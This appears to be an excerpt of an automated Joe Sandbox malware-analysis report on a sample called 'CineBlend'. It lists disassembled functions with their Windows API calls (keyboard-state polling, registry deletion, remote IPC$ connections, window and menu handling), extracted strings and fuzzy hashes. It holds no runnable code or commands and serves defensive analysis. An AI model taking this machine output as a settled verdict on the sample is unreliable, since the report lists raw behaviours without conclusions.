Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 9c2d0bb0b7eb5d6ce4f9cfd60815733f6191e61ddb5b2e955aa86ef2b6e74e5a
Instruction ID: fa513543ff984435a97db95cdaa8e5884d2d44a13b201a60f137872b32328b75
Opcode Fuzzy Hash: 9c2d0bb0b7eb5d6ce4f9cfd60815733f6191e61ddb5b2e955aa86ef2b6e74e5a
Instruction Fuzzy Hash: A8B17B31600219EFDF14CF68C9857AEBBF2FF44714F1880AAEC45AB295E774A980CB51

Function 00BA52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00BA52E6
GetWindowTextW.USER32(?,?,00000400), ref: 00BA5328
_wcslen.LIBCMT ref: 00BA5339
CharUpperBuffW.USER32(?,00000000), ref: 00BA5345
_wcsstr.LIBVCRUNTIME ref: 00BA537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00BA53B2
GetWindowTextW.USER32(?,?,00000400), ref: 00BA53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00BA5445
GetClassNameW.USER32(?,?,00000400), ref: 00BA5477
GetWindowRect.USER32(?,?), ref: 00BA54EF

Strings

ThumbnailClass, xrefs: 00BA53BD, 00BA5450

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b9109100867ca9c28b92cd8776b801ffca6cd2f37998deecbe09141dabde0b40
Instruction ID: 9c0a2c6f83605f19b6a5f41531bbdf7773dc2e41a4a78964f1704a1bf4796466
Opcode Fuzzy Hash: b9109100867ca9c28b92cd8776b801ffca6cd2f37998deecbe09141dabde0b40
Instruction Fuzzy Hash: 77911971508B06AFDB28CF24C894FAAB7E9FF56304F004559FA8683190EB31EE55CB91

Function 00BD976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BD97B6
GetFocus.USER32 ref: 00BD97C6
GetDlgCtrlID.USER32(00000000), ref: 00BD97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00BD9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BD992B
GetMenuItemCount.USER32(?), ref: 00BD9948
GetMenuItemID.USER32(?,00000000), ref: 00BD9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BD998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BD99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BD99FD

Strings

0, xrefs: 00BD98FB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 2d19e1ad8e9dbd3842bc53b353c66c48b7caa64e469a41dbf802a821845bdeed
Instruction ID: 1b3b18d3653771481ca3a1fb4e3a7169560ad2c42b6b64432fd3bf9242ce285e
Opcode Fuzzy Hash: 2d19e1ad8e9dbd3842bc53b353c66c48b7caa64e469a41dbf802a821845bdeed
Instruction Fuzzy Hash: 8781AF71604301AFD710CF24D884AABFBE8FB89754F00099EF98597391EB71D905DBA2

Function 00BAC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00C129C0,000000FF,00000000,00000030), ref: 00BAC973
SetMenuItemInfoW.USER32(00C129C0,00000004,00000000,00000030), ref: 00BAC9A8
Sleep.KERNEL32(000001F4), ref: 00BAC9BA
GetMenuItemCount.USER32(?), ref: 00BACA00
GetMenuItemID.USER32(?,00000000), ref: 00BACA1D
GetMenuItemID.USER32(?,-00000001), ref: 00BACA49
GetMenuItemID.USER32(?,?), ref: 00BACA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BACAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BACAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BACB0C

Strings

0, xrefs: 00BAC904

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 0af9af1b1bc71a3e36d4f67f151958bc946d96044cf1f4b42d6796257d3c1443
Instruction ID: ebac0e07bc067878094f9334b04ad4bc3ea4e71b988523316cd7a97ea6cd06e6
Opcode Fuzzy Hash: 0af9af1b1bc71a3e36d4f67f151958bc946d96044cf1f4b42d6796257d3c1443
Instruction Fuzzy Hash: 78619D70908249AFDF11CFA8DD89AFEBFE8FB06348F144096E951A3251DB31AD15CB60

Function 00BAE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BAE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BAE4FA
_wcslen.LIBCMT ref: 00BAE504
_wcsstr.LIBVCRUNTIME ref: 00BAE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BAE570

Strings

04090000, xrefs: 00BAE5A6
StringFileInfo\, xrefs: 00BAE543
DefaultLangCodepage, xrefs: 00BAE5D3
\VarFileInfo\Translation, xrefs: 00BAE568
%u.%u.%u.%u, xrefs: 00BAE64E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d61e25ac122a70d33938996b223ffd13c1d5523d979079d2a880a7d19e4f2237
Instruction ID: 81e2af9bab3f63d5591a2cd6335ac38eeb96cdf57d67ef8856b6b2c0870422ef
Opcode Fuzzy Hash: d61e25ac122a70d33938996b223ffd13c1d5523d979079d2a880a7d19e4f2237
Instruction Fuzzy Hash: C141F472A482047AEB04AB659C47EBF77ECDF56710F0401E6F901A61D2FB78EA01D2A5

Function 00BCD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCD6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BCD6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BCD7A8

Part of subcall function 00BCD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BCD70A
Part of subcall function 00BCD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BCD71D
Part of subcall function 00BCD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BCD72F
Part of subcall function 00BCD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BCD765
Part of subcall function 00BCD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BCD788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00BCD753

Strings

RegDeleteKeyExW, xrefs: 00BCD729
advapi32.dll, xrefs: 00BCD718

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: fb4882c3e888d8f917c7b63b3a456d327c42f8055b0c9a55e1c409f5246d69e2
Instruction ID: 619ebf7e232772b71035c5bc5d2f349bb8bf238746f96f88becc0292dcc1e537
Opcode Fuzzy Hash: fb4882c3e888d8f917c7b63b3a456d327c42f8055b0c9a55e1c409f5246d69e2
Instruction Fuzzy Hash: 01315E75A02129BBDB219B50DC98FFFBBBCEF45710F0041BAB855E3140EA349E459AA0

Function 00BAEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00BAEFCB

Part of subcall function 00B5F215: timeGetTime.WINMM(?,?,00BAEFEB), ref: 00B5F219

Sleep.KERNEL32(0000000A), ref: 00BAEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00BAF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BAF03E
SetActiveWindow.USER32 ref: 00BAF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BAF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00BAF08A
Sleep.KERNEL32(000000FA), ref: 00BAF095
IsWindow.USER32 ref: 00BAF0A1
EndDialog.USER32(00000000), ref: 00BAF0B2

Strings

BUTTON, xrefs: 00BAF030

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b5971ec5752aa275cffd2fdca95f8ff7e17b80f23d78a2af070a07d8ee397303
Instruction ID: 9817df98c6457cf89fcc5fabebd15285754cabe11c7a24de62baa196b18de713
Opcode Fuzzy Hash: b5971ec5752aa275cffd2fdca95f8ff7e17b80f23d78a2af070a07d8ee397303
Instruction Fuzzy Hash: 5421F375108246BFE7212F60EC99BBABBEAF74B748F0040B6F54183272DF718C008661

Function 00BAF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BAF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BAF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BAF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BAF3BE

Strings

open , xrefs: 00BAF323
close PlayMe, xrefs: 00BAF385, 00BAF3B2
alias PlayMe, xrefs: 00BAF34D
status PlayMe mode, xrefs: 00BAF36F
play PlayMe wait, xrefs: 00BAF3A8
play PlayMe, xrefs: 00BAF3B9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: a163978453c56956ab0dc1e2d94142cdfc2a0905005cbd7b1708556dcbe4e481
Instruction ID: 54a6804d22404461a43dcd82d836e3d49c627438142e4eeb8f7a139fbd97b693
Opcode Fuzzy Hash: a163978453c56956ab0dc1e2d94142cdfc2a0905005cbd7b1708556dcbe4e481
Instruction Fuzzy Hash: 0211A371E9416979DB24A7A58C4AEFF6BFCEBD2B40F0005B97401E20D1DAA06E05C5B1

Function 00BAA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00BAA9D9
SetKeyboardState.USER32(?), ref: 00BAAA44
GetAsyncKeyState.USER32(000000A0), ref: 00BAAA64
GetKeyState.USER32(000000A0), ref: 00BAAA7B
GetAsyncKeyState.USER32(000000A1), ref: 00BAAAAA
GetKeyState.USER32(000000A1), ref: 00BAAABB
GetAsyncKeyState.USER32(00000011), ref: 00BAAAE7
GetKeyState.USER32(00000011), ref: 00BAAAF5
GetAsyncKeyState.USER32(00000012), ref: 00BAAB1E
GetKeyState.USER32(00000012), ref: 00BAAB2C
GetAsyncKeyState.USER32(0000005B), ref: 00BAAB55
GetKeyState.USER32(0000005B), ref: 00BAAB63

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 75444f34488d964412cd0be1e00536fd1ca28610facada262a9636e57b6405f5
Instruction ID: c75489e914bc349fc5586cbe0a90a649968d9395d67a179f00562ee7098d2997
Opcode Fuzzy Hash: 75444f34488d964412cd0be1e00536fd1ca28610facada262a9636e57b6405f5
Instruction Fuzzy Hash: 4751B360A0C78429EB35DBA08950BAAAFF5DF13340F4845DE85C25B1C2DB649B4CC772

Function 00BA662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00BA6649
GetWindowRect.USER32(00000000,?), ref: 00BA6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00BA66C0
GetDlgItem.USER32(?,00000002), ref: 00BA66D0
GetWindowRect.USER32(00000000,?), ref: 00BA66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00BA6736
GetDlgItem.USER32(?,000003E9), ref: 00BA6744
GetWindowRect.USER32(00000000,?), ref: 00BA6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00BA6798
GetDlgItem.USER32(?,000003EA), ref: 00BA67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BA67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00BA67CE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: e41e59501a551d5c89fec754b6c4396be400262e3e9aedb60397c4b18a5a2105
Instruction ID: 84cf8c770673f6f7574054cd3917da7ae09f8331589b5e135f18f97cf620cb93
Opcode Fuzzy Hash: e41e59501a551d5c89fec754b6c4396be400262e3e9aedb60397c4b18a5a2105
Instruction Fuzzy Hash: 485122B1B01205AFDF18CF68DD95AAEBBB9FB48314F148169F919E7290EB709D04CB50

Function 00B4146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B41488,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B41865

DestroyWindow.USER32(?), ref: 00B41521
KillTimer.USER32(00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B415BB
DestroyAcceleratorTable.USER32(00000000), ref: 00B829B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B829E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000,?), ref: 00B829F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B4145A,00000000), ref: 00B82A15
DeleteObject.GDI32(00000000), ref: 00B82A27

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: db35aaf465d5c8ff9f259a5c1aee014200976966d88659f72e48c6c7e63df54a
Instruction ID: 78410fe18e79c8d4501d98c494beefb69452b8eddfab7ce7cd9a80a4a2825e72
Opcode Fuzzy Hash: db35aaf465d5c8ff9f259a5c1aee014200976966d88659f72e48c6c7e63df54a
Instruction Fuzzy Hash: 15616935901711DFDB39AF18D958B69B7F1FF91312F108999E08297670C770AA90EF44

Function 00B42128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00B42234: GetWindowLongW.USER32(?,000000EB), ref: 00B42242

GetSysColor.USER32(0000000F), ref: 00B42152

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 1e92c313693d8c1109f9cce97af8dab3d707f01e230a5e15c5cbf6fd948e985e
Instruction ID: 8f29280e371ff0e12245805581647ae08ea50a4b60d161622cb2d9a5e487f40b
Opcode Fuzzy Hash: 1e92c313693d8c1109f9cce97af8dab3d707f01e230a5e15c5cbf6fd948e985e
Instruction Fuzzy Hash: 3941D535101640AFDB205F38DC94BB97BE5EB42B30F554286FAA2A72E1D7318E42FB10

Function 00BAA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00B90D31,00000001,0000138C,00000001,00000001,00000001,?,00BBEEAE,00C12430), ref: 00BAA091
LoadStringW.USER32(00000000,?,00B90D31,00000001), ref: 00BAA09A

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B90D31,00000001,0000138C,00000001,00000001,00000001,?,00BBEEAE,00C12430,?), ref: 00BAA0BC
LoadStringW.USER32(00000000,?,00B90D31,00000001), ref: 00BAA0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAA1E0

Strings

Line %d:, xrefs: 00BAA11A
^ ERROR, xrefs: 00BAA175
Error: , xrefs: 00BAA197
%s (%d) : ==> %s: %s %s, xrefs: 00BAA1C4
Line %d (File "%s"):, xrefs: 00BAA109

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 505a7be7db4e134f5d3c5325e2d8077729a08fe41bccc82f8a8807c945767dc5
Instruction ID: f866ca36644ea2f9966396eb6f75390be6b02a9df981167f73425e3cd958a176
Opcode Fuzzy Hash: 505a7be7db4e134f5d3c5325e2d8077729a08fe41bccc82f8a8807c945767dc5
Instruction Fuzzy Hash: 90413272804109AACF05FBE0DD96EEEB7B8EF15700F5001A5F605B2092EB75AF49DB61

Function 00BA0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA1093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA10AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA10CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA10F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00BA111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA1128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA112D

Strings

\IPC$, xrefs: 00BA1075
SOFTWARE\Classes\, xrefs: 00BA0FFF
\CLSID, xrefs: 00BA1015

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 3222a0af07f2a53626a95095d3aaf21caf1a2edb27c9f177de9fac085e70e966
Instruction ID: 16e769775ecc194855cb1c09551357d799259fc5a633d1b8389cfd825f0f69a1
Opcode Fuzzy Hash: 3222a0af07f2a53626a95095d3aaf21caf1a2edb27c9f177de9fac085e70e966
Instruction Fuzzy Hash: 0F41F872C10229ABCF25EFA4DC95DEEB7B8FF14750F0045A9E945A31A1EB319E04DB50

Function 00BD4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00BD4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD4AF3
